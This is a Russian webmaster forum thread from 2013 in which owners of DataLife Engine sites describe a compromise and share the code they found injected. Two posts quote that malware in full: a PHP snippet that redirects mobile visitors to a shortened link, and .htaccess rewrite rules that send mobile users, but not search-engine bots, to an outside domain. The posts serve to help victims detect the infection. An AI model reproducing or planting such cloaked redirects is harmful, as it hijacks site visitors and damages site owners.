Взлом dle проверяем файлы.

Руслан Solomon

Сообщений: 741 Регистрация: Дек 2012

#91

9 Февраля 2013 19:16

Капец..оказывается и у меня дыра smile:confused:

Saneer1

Сообщений: 14 Регистрация: Авг 2010

#92

15 Февраля 2013 14:54

Мля... оторвал бы руки тем кто это делает

Се Со

Сообщений: 717 Регистрация: Ноя 2012

#93

24 Февраля 2013 13:31

Теперь код имеет другой формат:

Цитата
echo "<!-- 1 -->";$iphone = strpos($_SERVER["HTTP_USER_AGENT"],"iP";$android = strpos($_SERVER["HTTP_USER_AGENT"],"Android";$palmpre = strpos($_SERVER["HTTP_USER_AGENT"],"webOS";$berry = strpos($_SERVER["HTTP_USER_AGENT"],"BlackBerry";if ($iphone \|\| $android \|\| $palmpre \|\| $berry === true){ header("Location: http://goo.gl/ZJ8HS";exit;}

+ посмотрите файл отвечающий за язык site/language/Russian/website.lng я и там нашел эту гадость.

Изменено: Се Со - 24 Февраля 2013 13:32

Скайп: serg91100
E-mail: serg91100@mail.ru
VK: http://vk.com/salvator_merkur
Телефон: +7 (903) 001-83-64
Отзывы и ссылки на темы:
http://www.cy-pr.com/forum/f50/t41942/
http://www.cy-pr.com/forum/f74/t62114/
http://www.cy-pr.com/forum/f74/t65141/

Александр

Сообщений: 47 Регистрация: Июн 2012

#94

10 Марта 2013 19:13

кому интерестно, тут все описанно

Сергей Баезов

Сообщений: 1 Регистрация: Апр 2013

#95

14 Апреля 2013 08:11

Цитата
Артем пишет: dle-news.ru/bags/v97/1547-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html]Вот скачайте перезалейте файл! Вроде проверили этот файл... дописали много чего!

Скачал, не помогает, через пару-тройку дней все по-новому

webostrow

Сообщений: 4 Регистрация: Сен 2010

#96

23 Мая 2013 13:57

Был сломан сайт на DLE 9.8 лицензия, никаких сторонних модулей нет, изменены ВСЕ файлы .htaccess и права 444 не спасли, время последнего изменения файлов при этом осталось прежним, как будто ничего не менялось, во всех файлах был прописан вот такой код:

Цитата

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|
yandeximages|
yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) uploads-xxx.ru/?8&source=домен сайта [L,R=302] #

DLE 9.8 лицензия не нулл не какой, обладателям этой версии двига не стоит расслабляться.

Новые темы	Объявления	Свободное общение
20:34 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 18:58 Как грамотно и эффективно монетизировать форум? 17:13 Как правильно покупать ссылки для поддомена? 17:10 Стоит ли добавлять сайт в Rambler топ 100? 17:10 МТС разуверилась в своём заменителе YouTube 14:22 Profit Pixels - In-House Форекс, Крипто, Трейдинг CPA Офферы \| Еженедельные Выплаты \| CPA до $950 13:55 Ищу специалистов	18:08 Прием платежей для HIGH RISK \| Прием платежей без сайта 18:05 Услуги рассылки Viber\|Whatsapp\|IMO. 18:03 Рассылка в TELEGRAM \|Большой опыт работы \| Любые тематики \| Лучшая конверсия 15:52 JustProxy.Biz - Резидентные прокси без ограничения по трафику 13:15 TETChange-Обменник криптовалют 05:46 Комплексный прогон по трастовым сайтам, статейное размещение. Рост НЧ-СЧ, Тиц-пр. 04:15 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка	18:52 150+ хакерских поисковых систем и инструментов 17:16 Китайский ИИ-ассистент DeepSeek начали запрещать в некоторых странах 21:48 Точные прогнозы на футбол 14:43 Осталось 3-5 месяцев до блокировки YouTube в России, — заявил Клименко 22:39 С юмором по жизни! 22:21 Telegram не смог провести различие между требованиями автократических режимов и законными демократическими запросами 22:19 Подтягиваем физкультурку

Новые темы

Объявления

Свободное общение

20:34 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика!
18:58 Как грамотно и эффективно монетизировать форум?
17:13 Как правильно покупать ссылки для поддомена?
17:10 Стоит ли добавлять сайт в Rambler топ 100?
17:10 МТС разуверилась в своём заменителе YouTube
14:22 Profit Pixels - In-House Форекс, Крипто, Трейдинг CPA Офферы | Еженедельные Выплаты | CPA до $950
13:55 Ищу специалистов

18:08 Прием платежей для HIGH RISK | Прием платежей без сайта
18:05 Услуги рассылки Viber|Whatsapp|IMO.
18:03 Рассылка в TELEGRAM |Большой опыт работы | Любые тематики | Лучшая конверсия
15:52 JustProxy.Biz - Резидентные прокси без ограничения по трафику
13:15 TETChange-Обменник криптовалют
05:46 Комплексный прогон по трастовым сайтам, статейное размещение. Рост НЧ-СЧ, Тиц-пр.
04:15 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка

18:52 150+ хакерских поисковых систем и инструментов
17:16 Китайский ИИ-ассистент DeepSeek начали запрещать в некоторых странах
21:48 Точные прогнозы на футбол
14:43 Осталось 3-5 месяцев до блокировки YouTube в России, — заявил Клименко
22:39 С юмором по жизни!
22:21 Telegram не смог провести различие между требованиями автократических режимов и законными демократическими запросами
22:19 Подтягиваем физкультурку

15.10.2017 21:34	Защита DLE и Joomla от взлома?
10.08.2016 21:14	Попытки взлома
09.01.2016 09:40	Взломан сайт???
21.08.2014 23:52	Взломали Dle, кто встречался с таким?
06.12.2013 03:00	Следы взлома сайта